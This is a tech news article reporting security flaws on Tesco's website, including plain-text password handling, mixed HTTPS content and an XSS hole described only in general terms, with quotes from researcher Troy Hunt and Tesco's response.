Fresh Flaw Found On Tesco Website As Customer Anger Swells

A dangerous flaw has been found on the Tesco website, placing the company’s online customers at risk, TechWeekEurope has learned, just a day after the supermarket chain was lambasted for weak security practices.

Yesterday, security researcher Troy Hunt had exposed problems with Tesco security, including the fact that it appeared to be storing customer passwords in plain text without proper salting and hashing.

The Tesco.com site was also guilty of “mixed mode HTTPS”, where pages are loaded up over HTTPS but resources are loaded over HTTP, giving users “no assurances whatsoever”. Browsers pick up on when this happens and even warn users, yet Tesco still has not fixed the issue.

XSS issue

Today it emerged that an XSS flaw on the site could be exploited by hackers to hijack users’ accounts. TechWeekEurope has seen evidence proving that the flaw exists and has warned Tesco about it, but received no response. The XSS code will not be published for the safety of Tesco shoppers.

To get access to a user’s account, a cyber crook could trick a customer into clicking on a link, which would redirect them to the attacker’s server.

They would then be passed on to the Tesco website. At that point, code would be sent to a Tesco server via its search box on the homepage. If engineered correctly, this would pass cookie data back to the attacker’s server, and they would have access to the victim’s account. All of this could happen in seconds, and the user would be left clueless.

Hunt claimed the flaw should have been “very easily identified”, adding that Tesco could issue a “very quick fix” for the flaw. Yet there has been no response from the supermarket giant.

The latest WhiteHat Security report showed that over half (55 percent) of all sites contained an XSS flaw in 2011, making it the most common vulnerability on the web.

Hunt said he had also received an unverified claim of an SQL injection flaw on the Tesco website, which could be exploited to expose user information.

As for the password issues highlighted yesterday, Tesco sent over this response: “We know how important Internet security is to customers and the measures we have are robust. We are never complacent and work continuously to give customers the confidence that they can shop securely.”

A spokesperson confirmed the company would be looking into what people were saying online, but did not say if there was any plan for action. He claimed the site had never been hacked and Tesco had never been hit by any major security issue.

Despite online claims that Tesco had fixed the password problem, TechWeekEurope found the site has several different pages for password resets. One of those (see here) is more secure, as it takes users through a process of changing their password. But another (see here) gives customers their password back in plain text.

“You know what strikes me with this whole thing? There’s someone directing these comments to Tesco customer care, journalists and whoever else is asking that just doesn’t have the faintest clue,” Hunt added.

“It’s not about whether you’ve been hacked or whether you think you’re secure or not, there are blatantly obvious flaws at many levels and they just can’t acknowledge it.”

The security researcher and Microsoft Most Valuable Professional said he had seen 1,720 re-tweets over Twitter of a Tesco tweet that said passwords were copied into plain text “when pasted automatically into a password reminder email” – something of a paradox given that plain text is not a secure way to show sensitive data. There were also hundreds and possibly thousands of tweets to @UKTesco complaining about the issue, Hunt said.

“They’re just blindly saying ‘everything is fine’. Does that not strike you as odd?” he added.

“I would genuinely like to see them get on top of this, or at the very least understand the issues.”

Are you up on all the latest threats? Try our security quiz!